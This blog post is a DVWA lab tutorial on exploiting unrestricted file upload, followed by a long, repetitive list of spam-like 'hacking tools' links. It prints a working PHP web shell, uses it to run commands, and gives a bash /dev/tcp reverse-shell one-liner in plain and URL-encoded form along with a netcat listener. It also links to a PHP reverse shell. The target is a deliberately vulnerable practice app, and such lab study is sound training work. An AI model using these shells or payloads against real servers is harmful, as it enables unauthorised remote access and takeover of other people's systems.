hot info

Sunday, August 23, 2020

Learning Web Pentesting With DVWA Part 5: Using File Upload To Get Shell

In today's article we will go through the File Upload vulnerability of DVWA. File Upload vulnerability is a common vulnerability in which a web app doesn't restrict the type of files that can be uploaded to a server. The result of which is that a potential adversary uploads a malicious file to the server and finds his/her way to gain access to the server or perform other malicious activities. The consequences of Unrestricted File Upload are put out by OWASP as: "The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored."
For successful vulnerability exploitation, we need two things:
1. An unrestricted file upload functionality.
2. Access to the uploaded file to execute the malicious code.
To perform this type of attack on DVWA click on File Upload navigation link, you'll be presented with a file upload form like this:
Lets upload a simple text file to see what happens. I'll create a simple text file with the following command:
echo TESTUPLOAD > test.txt
and now upload it.
The server gives a response back that our file was uploaded successfully and it also gives us the path where our file was stored on the server. Now lets try to access our uploaded file on the server, we go to the address provided by the server which is something like this:
http://localhost:9000/hackable/uploads/test.txt
and we see the text we had written to the file. Lets upload a php file now since the server is using php. We will upload a simple php file containing phpinfo() function. The contents of the file should look something like this.
<?php
phpinfo();
?>
Save the above code in a file called info.php (you can use any name) and upload it. Now naviagte to the provided URL:
http://localhost:9000/hackable/uploads/info.php
and you should see a phpinfo page like this:
phpinfo page contains a lot of information about the web application, but what we are interested in right now in the page is the disable_functions column which gives us info about the disabled functions. We cannot use disabled functions in our php code. The function that we are interested in using is the system() function of php and luckily it is not present in the disable_functions column. So lets go ahead and write a simple php web shell:
<?php
system($_GET["cmd"]);
?>
save the above code in a file shell.php and upload it. Visit the uploaded file and you see nothing. Our simple php shell is looking for a "cmd" GET parameter which it passes then to the system() function which executes it. Lets check the user using the whoami command as follows:
http://localhost:9000/hackable/uploads/shell.php?cmd=whoami
we see a response from the server giving us the user under which the web application is running.
We can use other bash commands such as ls to list the directories. Lets try to get a reverse shell now, we can use our existing webshell to get a reverse shell or we can upload a php reverse shell. Since we already have webshell at our disposal lets try this method first.
Lets get a one liner bash reverseshell from Pentest Monkey Reverse Shell Cheat Sheet and modify it to suit our setup, but we first need to know our ip address. Enter following command in a terminal to get your ip address:
ifconfig docker0
the above command provides us information about our virtual docker0 network interface. After getting the ip information we will modify the bash one liner as:
bash -c 'bash -i >& /dev/tcp/172.17.0.1/9999 0>&1'
here 172.17.0.1 is my docker0 interface ip and 9999 is the port on which I'll be listening for a reverse shell. Before entering it in our URL we need to urlencode it since it has some special characters in it. After urlencoding our reverse shell one liner online, it should look like this:
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F9999%200%3E%261%27
Now start a listener on host with this command:
nc -lvnp 9999
and then enter the url encoded reverse shell in the cmd parameter of the url like this:
http://localhost:9000/hackable/uploads/shell.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F9999%200%3E%261%27
looking back at the listener we have a reverse shell.
Now lets get a reverse shell by uploading a php reverse shell. We will use pentest monkey php reverse shell which you can get here. Edit the ip and port values of the php reverse shell to 172.17.0.1 and 9999. Setup our netcat listener like this:
nc -lvnp 9999
and upload the reverse shell to the server and access it to execute our reverse shell.
That's it for today have fun.

References:

  1. Unrestricted File Upload: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
  2. Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
  3. Php Reverse Shell (Pentest Monkey): https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
More articles
  1. Hacking Tools Windows 10
  2. Hacker Tools Free Download
  3. Hacker Tools Hardware
  4. How To Install Pentest Tools In Ubuntu
  5. Github Hacking Tools
  6. Hacker Tools Free
  7. Pentest Tools Linux
  8. Kik Hack Tools
  9. Hacking Tools For Mac
  10. Hacker Tools
  11. Hack Tools
  12. Hack Rom Tools
  13. Hacking Apps
  14. Hack Tools For Games
  15. World No 1 Hacker Software
  16. Ethical Hacker Tools
  17. Hacker Tools Online
  18. Hack Tools For Ubuntu
  19. Pentest Tools Linux
  20. Hacker Tools For Mac
  21. Termux Hacking Tools 2019
  22. Hacking Tools Kit
  23. Hacker Tools For Pc
  24. Physical Pentest Tools
  25. Hacker Tools Software
  26. Hacking Tools Free Download
  27. Pentest Automation Tools
  28. Wifi Hacker Tools For Windows
  29. Hacker Tools 2019
  30. Pentest Tools Open Source
  31. Hacker Tools Software
  32. Install Pentest Tools Ubuntu
  33. Hacking Tools Online
  34. Pentest Tools Url Fuzzer
  35. Pentest Recon Tools
  36. Hack Tools Online
  37. Top Pentest Tools
  38. Pentest Tools Linux
  39. Pentest Tools
  40. Android Hack Tools Github
  41. Hacker Tools For Ios
  42. Tools 4 Hack
  43. Hacker Tools For Mac
  44. Hack Tools Pc
  45. Pentest Tools Download
  46. Install Pentest Tools Ubuntu
  47. Best Pentesting Tools 2018
  48. Hacking App
  49. Hacker Tools List
  50. Hack Tool Apk
  51. Hacker Hardware Tools
  52. Nsa Hack Tools Download
  53. Hack Website Online Tool
  54. Hacker Tool Kit
  55. Hackrf Tools
  56. Hacker Tools Github
  57. Hacker Techniques Tools And Incident Handling
  58. Nsa Hacker Tools
  59. Hacking Tools
  60. Bluetooth Hacking Tools Kali
  61. Hack Tools For Mac
  62. Hacking Apps
  63. Hacker Tools Apk Download
  64. Best Pentesting Tools 2018
  65. Hack Tools For Ubuntu
  66. Pentest Tools
  67. Hack Tools For Mac
  68. Growth Hacker Tools
  69. Usb Pentest Tools
  70. Hacks And Tools
  71. Beginner Hacker Tools
  72. Pentest Tools Windows
  73. Hacking Tools And Software
  74. Hacker Tools For Ios
  75. Hack Website Online Tool
  76. Hackers Toolbox
  77. Pentest Recon Tools
  78. Pentest Tools Url Fuzzer
  79. Hacker Tools Free Download
  80. Hacker Security Tools
  81. Hacker
  82. Best Pentesting Tools 2018
  83. Hackers Toolbox
  84. Hacking Tools Software
  85. Hacker Techniques Tools And Incident Handling
  86. Hack Apps
  87. Hack Tools 2019
  88. Hacking Tools Kit
  89. New Hacker Tools
  90. Hacking Tools Free Download
  91. Hack Tools For Ubuntu
  92. Hacking Tools Free Download
  93. What Is Hacking Tools
  94. Hacking Tools Download
  95. Hacker Security Tools
  96. Pentest Tools Windows
  97. Best Hacking Tools 2020
  98. Hackers Toolbox
  99. What Are Hacking Tools
  100. Hacker Tools Apk
  101. Hacker Security Tools
  102. Beginner Hacker Tools
  103. Hacker Tools For Windows
  104. Hack Tools
  105. Hak5 Tools
  106. Hacker Tools Online
  107. Pentest Tools Github
  108. Hack Tools
  109. Android Hack Tools Github
  110. Hack Tools
  111. Hacker Tools For Pc
  112. Hacking Apps
  113. Hackrf Tools
  114. Hacking Tools For Windows
  115. Hacking Tools For Windows Free Download
  116. Pentest Tools Tcp Port Scanner
  117. Install Pentest Tools Ubuntu
  118. Hacker Tools Apk
  119. Underground Hacker Sites
  120. Pentest Tools Windows
  121. Termux Hacking Tools 2019
  122. Pentest Tools Find Subdomains
  123. Hacker Tools Github
  124. Hack Tools
  125. Kik Hack Tools
  126. Pentest Tools Url Fuzzer
  127. Pentest Tools Online
  128. Hacking Tools Windows 10
  129. Pentest Automation Tools
  130. Hak5 Tools
  131. Hacking Tools Hardware
  132. Pentest Tools Android
  133. Pentest Tools Review
  134. Pentest Tools Subdomain
  135. Hacking Tools Free Download
  136. Hacking Tools For Pc
  137. Hacker Tools 2019
  138. Pentest Tools Review
  139. Pentest Box Tools Download
  140. Hack Tools 2019
  141. Hack Tools For Ubuntu
  142. Bluetooth Hacking Tools Kali
  143. Hacker Tools Windows
  144. How To Hack
  145. Hacking Tools Windows 10
  146. Hacking Tools 2019
  147. Tools Used For Hacking
  148. Pentest Reporting Tools
  149. Hack Tools Pc
  150. Pentest Box Tools Download
  151. Hack Tools For Games
  152. Hacking Tools And Software

No comments:

Post a Comment